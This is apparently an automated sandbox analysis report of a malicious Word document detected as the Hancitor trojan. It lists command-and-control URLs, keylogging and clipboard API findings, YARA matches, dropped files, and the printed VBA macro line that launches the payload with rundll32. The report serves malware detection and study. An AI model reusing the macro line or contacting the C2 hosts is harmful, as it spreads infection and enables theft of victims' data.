00000005.00000003.2254606007.0000000002932000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2309854794.0000000002934000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 
00000005.00000003.2644212048.000000000292F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2224817943.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phps
              Source: rundll32.exe, 00000005.00000003.2504428556.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2266316387.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2423532675.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2270908150.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1793878117.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1952161754.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2210739764.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1937072968.0000000002954000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2242990898.0000000002954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rhopulforopme.ru/8/forum.phpv
              Source: splwow64.exe String found in binary or memory: http://schemas.m
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.php
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.php.ru/8/forum.ph
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.phpCon
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.phpe.ru/8/forum.php
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.phpe.ru/8/forum.php7
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.phpe.ru/8/forum.phpe
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.phpe.ru/8/forum.phps
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.phper$
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.phpl
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.phporopme.ru5
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.phporopme.ruc
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.phpt.ru/8/forum.phpe
              Source: rundll32.exe String found in binary or memory: http://thowerteigime.com/8/forum.phpv
              Source: splwow64.exe String found in binary or memory: http://www.w3.o
              Source: unknown DNS traffic detected: queries for: api.ipify.org
              Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_042D28D0 lstrlenA,lstrlenA,InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 5_2_042D28D0
              Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: api.ipify.org Cache-Control: no-cache
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_028024DC OpenClipboard,GlobalAlloc,GlobalFix,EmptyClipboard,SetClipboardData,GlobalUnWire, 5_2_028024DC
              Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6624, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0282EA08 GetKeyboardState, 5_2_0282EA08
              Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_028024DC OpenClipboard,GlobalAlloc,GlobalFix,EmptyClipboard,SetClipboardData,GlobalUnWire, 5_2_028024DC
              Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_027FB3B4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 5_2_027FB3B4
              Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_027FB9F8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 5_2_027FB9F8
              Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02819B0C GetKeyState,GetKeyState,GetKeyState, 5_2_02819B0C

              System Summary

              Source: 0524_4109399728218.doc, type: SAMPLE Matched rule: Detects OLE documents with ObjectPool OLE storage and embed suspicous excutable files Author: ditekSHen
              Source: 5.2.rundll32.exe.28e0000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 5.2.rundll32.exe.28e0000.2.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
              Source: 5.2.rundll32.exe.28d0174.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 5.2.rundll32.exe.42d0000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 5.2.rundll32.exe.28d0174.1.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
              Source: 5.2.rundll32.exe.42d0000.3.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
              Source: 5.2.rundll32.exe.28e0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 5.2.rundll32.exe.28e0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
              Source: 5.2.rundll32.exe.42d0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 5.2.rundll32.exe.42d0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
              Source: 5.2.rundll32.exe.28d0174.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 5.2.rundll32.exe.28d0174.1.raw.unpack, type: UNPACKEDPE Matched rule: Hancitor Payload Author: kevoreilly
              Source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Hancitor Payload Author: kevoreilly
              Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Hancitor Payload Author: kevoreilly
              Source: Process Memory Space: rundll32.exe PID: 6624, type: MEMORYSTR Matched rule: Windows_Trojan_Hancitor_6738d84a Author: unknown
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.dr Stream path '\x11_1744017892/VBA/ThisDocument'
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.kJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: c:\users\user\appdata\roaming\microsoft\word\startup\ket.t (copy)Jump to dropped file
              Source: 0524_4109399728218.docOLE, VBA macro line: Shell ("rundll32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,EUAYKIYBPAX")
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drStream path '\x11_1744017892/VBA/ThisDocument' : Found suspicious string scripting.filesystemobject in non macro stream
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0282748C5_2_0282748C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027DD8045_2_027DD804
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: 0524_4109399728218.docOLE indicator, ObjectPool: true
              Source: 0524_4109399728218.doc, type: SAMPLEMatched rule: INDICATOR_OLE_ObjectPool_Embedded_Files author = ditekSHen, description = Detects OLE documents with ObjectPool OLE storage and embed suspicous excutable files
              Source: 5.2.rundll32.exe.28e0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.28e0000.2.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 5.2.rundll32.exe.28d0174.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.42d0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.28d0174.1.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 5.2.rundll32.exe.42d0000.3.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 5.2.rundll32.exe.28e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.28e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 5.2.rundll32.exe.42d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.42d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 5.2.rundll32.exe.28d0174.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.28d0174.1.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: Process Memory Space: rundll32.exe PID: 6624, type: MEMORYSTRMatched rule: Windows_Trojan_Hancitor_6738d84a reference_sample = a674898f39377e538f9ec54197689c6fa15f00f51aa0b5cc75c2bafd86384a40, os = windows, severity = x86, creation_date = 2021-06-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Hancitor, fingerprint = 44a4dd7c35e0b4f3f161b82463d8f0ee113eaedbfabb7d914ce9486b6bd3a912, id = 6738d84a-7393-4db2-97cc-66f471b5699a, last_modified = 2021-08-23
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 027D40E8 appears 47 times
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 027D6624 appears 65 times
              Source: 0524_4109399728218.docOLE, VBA macro line: Private Sub Document_Open()
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028182CC NtdllDefWindowProc_A,DefFrameProcA,5_2_028182CC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281D70C NtdllDefWindowProc_A,5_2_0281D70C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0282748C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,5_2_0282748C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02831990 NtdllDefWindowProc_A,GetCapture,5_2_02831990
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02803E5C NtdllDefWindowProc_A,5_2_02803E5C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281DFFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,5_2_0281DFFC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0281DF10 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,5_2_0281DF10
              Source: 0524_4109399728218.docOLE indicator, VBA macros: true
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drOLE indicator, VBA macros: true
              Source: 0524_4109399728218.LNK.1.drLNK file: ..\..\..\..\..\Desktop\0524_4109399728218.doc
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{905C0DA3-74DE-4233-9B57-2F4E7179B01B}.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@7/60@814/2
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027F883C GetLastError,FormatMessageA,5_2_027F883C
              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027EE2C0 FindResourceA,LoadResource,SizeofResource,LockResource,5_2_027EE2C0
              Source: 0524_4109399728218.docOLE document summary: title field not present or empty
              Source: 0524_4109399728218.docOLE document summary: edited time not present or 0
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drOLE document summary: title field not present or empty
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drOLE document summary: author field not present or empty
              Source: ~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmp.1.drOLE document summary: edited time not present or 0
              Source: 0524_4109399728218.docVirustotal: Detection: 65%
              Source: 0524_4109399728218.docReversingLabs: Detection: 65%
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\0524_4109399728218.doc" /o "
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: 0524_4109399728218.docOLE indicator, Word Document stream: true
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{C3AFC820-F704-4039-93CB-2E74424E0595} - OProcSessId.datJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D8B14 GetDiskFreeSpaceA,5_2_027D8B14
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX
              Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/settings.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/document.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/styles.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = customXml/item2.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = customXml/itemProps3.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = customXml/item3.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = customXml/itemProps2.xml
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = [trash]/0000.dat
              Source: Text Sidebar (Annual Report Red and Black design).docx.1.drInitial sample: OLE zip file path = docProps/custom.xml
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
              Source: 0524_4109399728218.docStatic file information: File size 1335808 > 1048576
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02838ED0 push 02838F5Dh; ret 5_2_02838F55
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02861584 push dword ptr [ebp-14h]; ret 5_2_02861FEA
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0280429C push 028042DFh; ret 5_2_028042D7
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028043E8 push 02804414h; ret 5_2_0280440C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0280431C push 02804348h; ret 5_2_02804340
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02804354 push 0280438Ch; ret 5_2_02804384
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D63A0 push 027D63CCh; ret 5_2_027D63C4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D639E push 027D63CCh; ret 5_2_027D63C4
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027EA078 push ecx; mov dword ptr [esp], edx5_2_027EA07D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028000E0 push 0280011Eh; ret 5_2_02800116
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D60E4 push 027D6135h; ret 5_2_027D612D
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02858020 push 0285804Ch; ret 5_2_02858044
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02858078 push 028580A4h; ret 5_2_0285809C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027E811C push 027E8169h; ret 5_2_027E8161
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0283A1E8 push 0283A214h; ret 5_2_0283A20C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027E81F4 push 027E8220h; ret 5_2_027E8218
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027EA1D8 push ecx; mov dword ptr [esp], edx5_2_027EA1DD
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02800128 push 02800154h; ret 5_2_0280014C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02800160 push 02800198h; ret 5_2_02800190
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027EA194 push ecx; mov dword ptr [esp], edx5_2_027EA199
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027E6664 push 027E670Ch; ret 5_2_027E6704
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02800630 push 0280065Ch; ret 5_2_02800654
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027FE694 push 027FE764h; ret 5_2_027FE75C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0282E7A8 push ecx; mov dword ptr [esp], ecx5_2_0282E7AC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027E670E push 027E683Ch; ret 5_2_027E6834
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02800484 push 028004B0h; ret 5_2_028004A8
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D6418 push 027D6444h; ret 5_2_027D643C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027DE4B8 push 027DE4E4h; ret 5_2_027DE4DC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0285C46C push 0285C4A4h; ret 5_2_0285C49C
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_028085B8 push ecx; mov dword ptr [esp], ecx5_2_028085BC
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027E65EC push 027E6662h; ret 5_2_027E665A
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02861584 GetEnhMetaFileW,GetEnhMetaFileW,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,LoadLibraryA,GetProcAddress,VirtualAllocEx,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,LoadCursorW,DeleteObject,DeleteObject,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,AddFontResourceA,A